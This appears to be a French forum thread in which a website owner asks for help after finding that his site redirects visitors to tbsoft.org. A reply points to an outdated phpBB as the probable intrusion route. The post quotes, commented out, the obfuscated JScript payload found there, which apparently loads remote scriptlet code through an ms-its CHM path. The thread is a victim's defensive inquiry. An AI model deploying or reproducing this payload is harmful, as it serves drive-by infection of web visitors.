Logo GNT
Actualités Tests & Guides Bons Plans
GTA 6 iPhone 17 Copilot Switch 2 Temu ChatGPT Tesla
OVH Cloud OVH Cloud
Entraide Développement Développement Langage JavaScript tbsoft ( probleme tres etrange )

tbsoft ( probleme tres etrange )

21 réponses
Avatar
Xaero
Bonjour,

Lorsque je consulte mon site web ( http://www.xaero-method.com )

avant d'afficher la page , ie indique qu'il ouvre d'abord cette page :

http://tbsoft.org/index.php ( puis redirigé sur tbsoft.org/indexold.html )

quand je consulte un autre site ( au hasard google.fr ) , cela n'apparait
pas

j'ai tenté un tracert pour voir , tbsoft.org n'apparait pas , il y aurait
donc bien un probleme directement sur le serveur

j'ai regardé la conf d'apache , tout m'a l'air normal.

Je vous joint la liste des process qui tourne sur le serveur :

1 root 0.0 % Oct08 init
2 root 0.0 % Oct08 [keventd]
3 root 0.0 % Oct08 [ksoftirqd_CPU0]
8 root 0.0 % Oct08 [bdflush]
4 root 0.0 % Oct08 [kswapd]
5 root 0.0 % Oct08 [kscand/DMA]
6 root 0.1 % Oct08 [kscand/Normal]
7 root 0.0 % Oct08 [kscand/HighMem]
9 root 0.0 % Oct08 [kupdated]
10 root 0.0 % Oct08 [mdrecoveryd]
14 root 0.0 % Oct08 [kjournald]
71 root 0.0 % Oct08 [khubd]
2794 root 0.0 % Oct08 [kjournald]
3097 root 0.0 % Oct08 syslogd -m 0
3101 root 0.0 % Oct08 klogd -x
3119 rpc 0.0 % Oct08 [portmap]
3138 rpcuser 0.0 % Oct08 [rpc.statd]
3234 root 0.0 % Oct08 /usr/sbin/snmpd -s -l /dev/null -P
/var/run/snmpd -a
3244 root 0.0 % Oct08 /usr/sbin/snmptrapd -s -u /var/run/snmptrapd.pid
3254 named 0.0 % Oct08 [named]
3267 root 0.0 % Oct08 /usr/sbin/sshd
3281 root 0.0 % Oct08 xinetd -stayalive -pidfile /var/run/xinetd.pid
3293 root 0.0 % Oct08 /bin/sh
/usr/bin/safe_mysqld --defaults-file=/etc/my.cnf
3323 mysql 6.1 % Oct08 [mysqld]
3358 root 0.0 % Oct08 /usr/bin/spamd -d -c -a
3367 root 0.0 % Oct08 gpm -t imps2 -m /dev/mouse
3384 root 0.0 % Oct08 crond
3403 xfs 0.0 % Oct08 [xfs]
3421 daemon 0.0 % Oct08 [atd]
3438 root 0.0 % Oct08 /usr/local/apache/bin/httpd
3462 root 0.0 % Oct08 /usr/bin/perl /usr/libexec/usermin/miniserv.pl
/etc/usermin/miniserv.conf
3469 root 0.0 % Oct08 /usr/bin/perl /usr/libexec/webmin/miniserv.pl
/etc/webmin/miniserv.conf
3472 root 0.0 % Oct08 /sbin/mingetty tty1
3473 root 0.0 % Oct08 /sbin/mingetty tty2
3474 root 0.0 % Oct08 /sbin/mingetty tty3
3475 root 0.0 % Oct08 /sbin/mingetty tty4
3476 root 0.0 % Oct08 /sbin/mingetty tty5
3477 root 0.0 % Oct08 /sbin/mingetty tty6
1684 root 0.0 % 00:00 [sendmail]
1695 smmsp 0.0 % 00:00 [sendmail]
14685 root 0.0 % 07:10 /usr/sbin/sshd
14690 root 0.0 % 07:10 -bash
14892 apache 0.5 % 07:13 [httpd]
14990 apache 0.0 % 07:15 [httpd]
14996 apache 0.0 % 07:15 [httpd]
15007 apache 0.5 % 07:15 [httpd]
15011 apache 0.0 % 07:15 [httpd]
15012 apache 0.0 % 07:15 [httpd]
15022 apache 0.0 % 07:15 [httpd]
15027 apache 0.2 % 07:15 [httpd]
15030 apache 0.1 % 07:15 [httpd]
15031 apache 0.0 % 07:15 [httpd]
15041 apache 0.0 % 07:15 [httpd]
15048 apache 0.4 % 07:15 [httpd]
15050 apache 0.1 % 07:15 [httpd]
15051 apache 0.0 % 07:15 [httpd]
15055 apache 0.0 % 07:15 [httpd]
15056 apache 0.0 % 07:15 [httpd]
15057 apache 0.0 % 07:15 [httpd]
15058 apache 0.0 % 07:15 [httpd]
15090 root 0.0 % 07:16 /usr/bin/perl /usr/libexec/webmin/miniserv.pl
/etc/webmin/miniserv.conf
15092 root 0.1 % 07:16 /usr/bin/perl /usr/libexec/webmin/miniserv.pl
/etc/webmin/miniserv.conf
15128 root 0.0 % 07:16 /usr/bin/perl /usr/libexec/webmin/miniserv.pl
/etc/webmin/miniserv.conf
15133 root 4.0 % 07:16 /usr/libexec/webmin/proc/index_search.cgi


je me suis rendu sur le site tbsoft.org et voila ce qui apparait dans le
source de la page :

<!-- ( j'ai commenté au cas où mais cela n'est pas présent à l'origine )


<script language="JScript">
document.write(unescape('%u003C%u006F%u0062%u006A%u0065%u0063%u0074%u0020%u0
00D%u000A%u000D%u000A%u0064%u0061%u0074%u0061%u003D%u0022%u0026%u0023%u0031%
u0030%u0039%u003B%u0026%u0023%u0031%u0031%u0035%u003B%u0026%u0023%u0034%u003
5%u003B%u0026%u0023%u0031%u0030%u0035%u003B%u0026%u0023%u0031%u0031%u0036%u0
03B%u0026%u0023%u0031%u0031%u0035%u003B%u0026%u0023%u0035%u0038%u003B%u0026%
u0023%u0031%u0030%u0039%u003B%u0026%u0023%u0031%u0030%u0034%u003B%u0026%u002
3%u0031%u0031%u0036%u003B%u0026%u0023%u0031%u0030%u0039%u003B%u0026%u0023%u0
031%u0030%u0038%u003B%u0026%u0023%u0035%u0038%u003B%u0026%u0023%u0031%u0030%
u0032%u003B%u0026%u0023%u0031%u0030%u0035%u003B%u006C%u0065%u003A%u002F%u002
F%u0043%u003A%u000D%u000A%u000D%u000A%u005C%u005C%u004D%u0041%u0049%u004E%u0
02E%u004D%u0048%u0054%u0021%u0068%u0074%u0074%u0070%u003A%u002F%u002F%u0074%
u0062%u0073%u006F%u0066%u0074%u002E%u006F%u0072%u0067%u002F%u002F%u0069%u006
E%u0064%u0065%u0078%u002E%u0063%u0068%u006D%u003A%u003A%u002F%u0031%u002E%u0
068%u0074%u006D%u006C%u0022%u0020%u0074%u0079%u0070%u0065%u003D%u0022%u0074%
u0065%u0078%u0074%u002F%u0078%u002D%u0073%u0063%u0072%u0069%u0070%u0074%u006
C%u0065%u0074%u0022%u003E%u003C%u002F%u006F%u0062%u006A%u0065%u0063%u0074%u0
03E'));document.close();
</script>



-->


ce site execute donc du code javascript chez toutes les personnes qui
visitent mon site !!!

je ne sais pas du tout ce que produit ce code ( à ce niveau , j'ai
crossposté sur fr.comp.lang.javascript )


( fu2 sur alt.fr.comp.securite )

merci beaucoup pour votre aide ...

--
Xaero,
Jeu en ligne Xm-jdr
http://www.xaero-method.com/jdr
Signaler un problème avec ce contenu

1 réponse

Supprimer
Cette action est irreversible, confirmez la suppression du commentaire ?
Signaler le commentaire

Veuillez sélectionner un problème

Nudité
Violence
Harcèlement
Fraude
Vente illégale
Discours haineux
Terrorisme
Autre
1 2 3
Avatar
Simon Marechal
Cedric Blancher wrote:
phpBB 2.0.6 n'est pas à jour. Là encore, il y a pas mal de failles de
sécurité corrigées dans les 2.0.7 et 2.0.8 par rapport à la 2.0.6. Je
dois avouer que c'est amha la source probable de l'intrusion. Il faut


D'autant plus qu'il est tombé une injection de code php arbitraire le
mois dernier sur tous les 2.0.x<2.0.11 ...

1 2 3